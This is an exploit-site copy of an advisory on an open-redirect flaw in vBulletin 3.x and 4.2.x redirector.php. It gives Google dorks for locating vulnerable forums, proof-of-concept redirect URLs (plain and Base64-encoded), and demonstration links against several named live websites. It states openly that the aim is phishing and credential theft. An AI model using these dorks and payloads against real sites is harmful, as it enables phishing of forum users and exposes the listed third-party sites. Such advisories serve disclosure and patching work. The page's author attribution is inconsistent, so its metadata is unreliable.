Advertisement






vBulletin redirector 3.x.x & 4.2.x Open Redirect Vulnerability

CVE Category Price Severity
CVE-2014-3103 CWE-601 Not specified High
Author Risk Exploitation Type Date
KingSkrupellos High Remote 2018-01-24
CPE
cpe:cpe:/a:vbulletin:vbulletin:3.0.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010251

Below is a copy:

vBulletin redirector 3.x.x & 4.2.x Open Redirect Vulnerability
[+] Title: vBulletin 3.x.x & 4.2.x Open Redirect Vulnerability
[+] Date: 2018-01-24
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.vBulletin.com
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable Parameter: Get Method
[+] Vulnerable File: /redirector.php?url=
                     /redirector.php?do=nodelay&url=
[+] Dorks : inurl:/redirector.php?url=
            intext:"Powered by vBulletin Version"

### Notes:

[+] Unvalidated Redirects vulnerability in vBulletin 3.x.x and 4.2.x , allows when application accepts untrusted input that could cause the web application to redirect the request to a URL contained within an untrusted input. By modifying untrusted URLs into a malicious site, an attacker can successfully launch a phishing and steal user credentials.

### POC-I:

[+} http://vB-Forum/redirector.php?url=[URL]

[+} http://vB-Forum/redirector.php?do=nodelay&url=[URL]

### Demo-I:

[+] http://www.alnhdi.net/vb/redirector.php?url=https://www.google.com/

[+] http://hondasquad.com/forum/redirector.php?url=https://google.com/

[+] http://warezhr.org/forum/redirector.php?url=https://google.com/

[+] http://duckload.ws/forum/redirector.php?url=https://google.com/

[+] http://tvoya-stroika.com/redirector.php?url=https://google.com/

[+] http://kadago.de/forum/redirector.php?url=https://google.com/

[+] http://nadi-mahasen.com/vb/redirector.php?do=nodelay&url=https://google.com/

### In some versions; URL Encoded by Base64:

[+] Example: https://www.google.com/
             ==> Base64 Algorithm
             ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
        
### POC-II:

[+} http://vB-Forum/redirector.php?url=[URL Encoded by Base64]

[+} http://vB-Forum/redirector.php?do=nodelay&url=[URL Encoded by Base64]

### Demo-II:

[+] http://forums.corsairs-harbour.ru/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

[+] http://tune-g.ru/forum/redirector.php?do=nodelay&url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

[+] http://tune-g.ru/forum/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### Special Thanks:

[+] CertCC.ir

[+] Gucert.ir

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.